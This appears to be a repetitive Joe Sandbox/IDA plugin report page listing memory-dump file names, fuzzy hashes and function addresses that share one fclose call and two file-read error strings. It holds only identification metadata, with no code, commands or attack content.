Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 154d500ec481c67e13ffc494206958d418c1f362b2e2f738ccfd319bfb8ad6a4
Instruction ID: c2adb0843ecf5f2e7aa9c09abe668fbf21adaeda694f2383d2b7a87097ce4279
Opcode Fuzzy Hash: 154d500ec481c67e13ffc494206958d418c1f362b2e2f738ccfd319bfb8ad6a4
Instruction Fuzzy Hash: 42F0891BB08703A1F966BA05B5427B9D2611F917A6EC946B58E5C0B7C1ED3DD883A320

Function 00007FF73AFB4868 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF73AFB4B30

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF73AFB4B6C
fs_file_read, xrefs: 00007FF73AFB4B65

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 520813e33329b750e3963fa54af0ddf7f85e3967f46242181639c522c87cb1df
Instruction ID: 07523cd7b246b06516d9fde137f5512024a059e274d7aefd57b876658a23df44
Opcode Fuzzy Hash: 520813e33329b750e3963fa54af0ddf7f85e3967f46242181639c522c87cb1df
Instruction Fuzzy Hash: A4F0891BB08703A1F966BA05B5427B9D2612F917A2EC945B58E5C0B7C1DD3DD883A320

Function 00007FF73AFB4886 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF73AFB4B30

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF73AFB4B6C
fs_file_read, xrefs: 00007FF73AFB4B65

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 6c395e6ba415590d5e0bd5d3bc4afc3b87ada120f1a43e215a29034403e5e212
Instruction ID: bc301c86fa634eb69e62cedba2ebb7a80ff8b286bc8d778d070b1e5505b098cd
Opcode Fuzzy Hash: 6c395e6ba415590d5e0bd5d3bc4afc3b87ada120f1a43e215a29034403e5e212
Instruction Fuzzy Hash: 3BF0891BB08703A1F966BA05B5427B9D2611F917A6EC945B5CE5C0B7C1DE3DE883A320

Function 00007FF73AFB487C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF73AFB4B30

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF73AFB4B6C
fs_file_read, xrefs: 00007FF73AFB4B65

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 2d470b454d1b83473dcad47d79110d7c9b1ff52ae2f275e3c7603e850d8f8943
Instruction ID: c6ec84a7d4d283298ee2505ac9a393300419101efec1e0678bff953c783e0e24
Opcode Fuzzy Hash: 2d470b454d1b83473dcad47d79110d7c9b1ff52ae2f275e3c7603e850d8f8943
Instruction Fuzzy Hash: 74F0891BB08703A1F966BA05B5437B9D2611F917A6EC945B58E5C0B7C1DD3DD883A320

Function 00007FF73AFB4890 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF73AFB4B30

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF73AFB4B6C
fs_file_read, xrefs: 00007FF73AFB4B65

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 51c2798a37035670ba458129dd959f311a42a3f83bbc49bd4d05ed116acae8ee
Instruction ID: b09454893cffa80c5166c2b32afb758a243d9c7947afc551eeeb0d7fd3e166ea
Opcode Fuzzy Hash: 51c2798a37035670ba458129dd959f311a42a3f83bbc49bd4d05ed116acae8ee
Instruction Fuzzy Hash: 62F0891BB08703A1F966BA05B5427B9D2611F917A6EC945B58E5C0B7C1DD3DD883A320

Function 00007FF73AFB4B1C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF73AFB4B30

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF73AFB4B6C
fs_file_read, xrefs: 00007FF73AFB4B65

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: f60ff86bf2d525c290b10fdb5cd24a568a02267bd55b3a20e4c65a60655f2123
Instruction ID: 90414ec8a860d6560aa9817dc50bf85e0942721a4c71c4fd0f707513a288a978
Opcode Fuzzy Hash: f60ff86bf2d525c290b10fdb5cd24a568a02267bd55b3a20e4c65a60655f2123
Instruction Fuzzy Hash: 38F0891BB08703A1F967BA05B5427B9D2611F917A6EC945B58E5C0B7C1DD3DD883A320

Function 00007FF73AFB475D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF73AFB4B30

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF73AFB4B6C
fs_file_read, xrefs: 00007FF73AFB4B65

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 520813e33329b750e3963fa54af0ddf7f85e3967f46242181639c522c87cb1df
Instruction ID: 07523cd7b246b06516d9fde137f5512024a059e274d7aefd57b876658a23df44
Opcode Fuzzy Hash: 520813e33329b750e3963fa54af0ddf7f85e3967f46242181639c522c87cb1df
Instruction Fuzzy Hash: A4F0891BB08703A1F966BA05B5427B9D2612F917A2EC945B58E5C0B7C1DD3DD883A320

Function 00007FF73AFB4771 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF73AFB4B30

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF73AFB4B6C
fs_file_read, xrefs: 00007FF73AFB4B65

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 2d470b454d1b83473dcad47d79110d7c9b1ff52ae2f275e3c7603e850d8f8943
Instruction ID: c6ec84a7d4d283298ee2505ac9a393300419101efec1e0678bff953c783e0e24
Opcode Fuzzy Hash: 2d470b454d1b83473dcad47d79110d7c9b1ff52ae2f275e3c7603e850d8f8943
Instruction Fuzzy Hash: 74F0891BB08703A1F966BA05B5437B9D2611F917A6EC945B58E5C0B7C1DD3DD883A320

Function 00007FF73AFB4767 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF73AFB4B30

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF73AFB4B6C
fs_file_read, xrefs: 00007FF73AFB4B65

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 154d500ec481c67e13ffc494206958d418c1f362b2e2f738ccfd319bfb8ad6a4
Instruction ID: c2adb0843ecf5f2e7aa9c09abe668fbf21adaeda694f2383d2b7a87097ce4279
Opcode Fuzzy Hash: 154d500ec481c67e13ffc494206958d418c1f362b2e2f738ccfd319bfb8ad6a4
Instruction Fuzzy Hash: 42F0891BB08703A1F966BA05B5427B9D2611F917A6EC946B58E5C0B7C1ED3DD883A320

Function 00007FF73AFB4785 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF73AFB4B30

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF73AFB4B6C
fs_file_read, xrefs: 00007FF73AFB4B65

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 51c2798a37035670ba458129dd959f311a42a3f83bbc49bd4d05ed116acae8ee
Instruction ID: b09454893cffa80c5166c2b32afb758a243d9c7947afc551eeeb0d7fd3e166ea
Opcode Fuzzy Hash: 51c2798a37035670ba458129dd959f311a42a3f83bbc49bd4d05ed116acae8ee
Instruction Fuzzy Hash: 62F0891BB08703A1F966BA05B5427B9D2611F917A6EC945B58E5C0B7C1DD3DD883A320

Function 00007FF73AFB477B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF73AFB4B30

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF73AFB4B6C
fs_file_read, xrefs: 00007FF73AFB4B65

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 6c395e6ba415590d5e0bd5d3bc4afc3b87ada120f1a43e215a29034403e5e212
Instruction ID: bc301c86fa634eb69e62cedba2ebb7a80ff8b286bc8d778d070b1e5505b098cd
Opcode Fuzzy Hash: 6c395e6ba415590d5e0bd5d3bc4afc3b87ada120f1a43e215a29034403e5e212
Instruction Fuzzy Hash: 3BF0891BB08703A1F966BA05B5427B9D2611F917A6EC945B5CE5C0B7C1DE3DE883A320

Function 00007FF73AFB4B8B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF73AFB4B30

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF73AFB4B6C
fs_file_read, xrefs: 00007FF73AFB4B65

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: e183677a8e0ea8f18f94efad3779a0803dc6665ae2a179df65e612e2f536ceb0
Instruction ID: 02a0b241052960c2e49cc252a8307ab4d62544ef9ea87d888f4e25dd9c9bf4cc
Opcode Fuzzy Hash: e183677a8e0ea8f18f94efad3779a0803dc6665ae2a179df65e612e2f536ceb0
Instruction Fuzzy Hash: 4AF0891BB08703A1F967BB05B5427B9D2611F917A6ECD45B18E5C0B7C1DD3DD883A320

Function 00007FF73AFB47B2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF73AFB4B30

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF73AFB4B6C
fs_file_read, xrefs: 00007FF73AFB4B65

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 154d500ec481c67e13ffc494206958d418c1f362b2e2f738ccfd319bfb8ad6a4
Instruction ID: c2adb0843ecf5f2e7aa9c09abe668fbf21adaeda694f2383d2b7a87097ce4279
Opcode Fuzzy Hash: 154d500ec481c67e13ffc494206958d418c1f362b2e2f738ccfd319bfb8ad6a4
Instruction Fuzzy Hash: 42F0891BB08703A1F966BA05B5427B9D2611F917A6EC946B58E5C0B7C1ED3DD883A320

Function 00007FF73AFB47A8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF73AFB4B30

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF73AFB4B6C
fs_file_read, xrefs: 00007FF73AFB4B65

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 520813e33329b750e3963fa54af0ddf7f85e3967f46242181639c522c87cb1df
Instruction ID: 07523cd7b246b06516d9fde137f5512024a059e274d7aefd57b876658a23df44
Opcode Fuzzy Hash: 520813e33329b750e3963fa54af0ddf7f85e3967f46242181639c522c87cb1df
Instruction Fuzzy Hash: A4F0891BB08703A1F966BA05B5427B9D2612F917A2EC945B58E5C0B7C1DD3DD883A320

Function 00007FF73AFB47C6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF73AFB4B30

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF73AFB4B6C
fs_file_read, xrefs: 00007FF73AFB4B65

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 6c395e6ba415590d5e0bd5d3bc4afc3b87ada120f1a43e215a29034403e5e212
Instruction ID: bc301c86fa634eb69e62cedba2ebb7a80ff8b286bc8d778d070b1e5505b098cd
Opcode Fuzzy Hash: 6c395e6ba415590d5e0bd5d3bc4afc3b87ada120f1a43e215a29034403e5e212
Instruction Fuzzy Hash: 3BF0891BB08703A1F966BA05B5427B9D2611F917A6EC945B5CE5C0B7C1DE3DE883A320

Function 00007FF73AFB47BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF73AFB4B30

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF73AFB4B6C
fs_file_read, xrefs: 00007FF73AFB4B65

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 2d470b454d1b83473dcad47d79110d7c9b1ff52ae2f275e3c7603e850d8f8943
Instruction ID: c6ec84a7d4d283298ee2505ac9a393300419101efec1e0678bff953c783e0e24
Opcode Fuzzy Hash: 2d470b454d1b83473dcad47d79110d7c9b1ff52ae2f275e3c7603e850d8f8943
Instruction Fuzzy Hash: 74F0891BB08703A1F966BA05B5437B9D2611F917A6EC945B58E5C0B7C1DD3DD883A320

Function 00007FF73AFB47D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF73AFB4B30

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF73AFB4B6C
fs_file_read, xrefs: 00007FF73AFB4B65

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
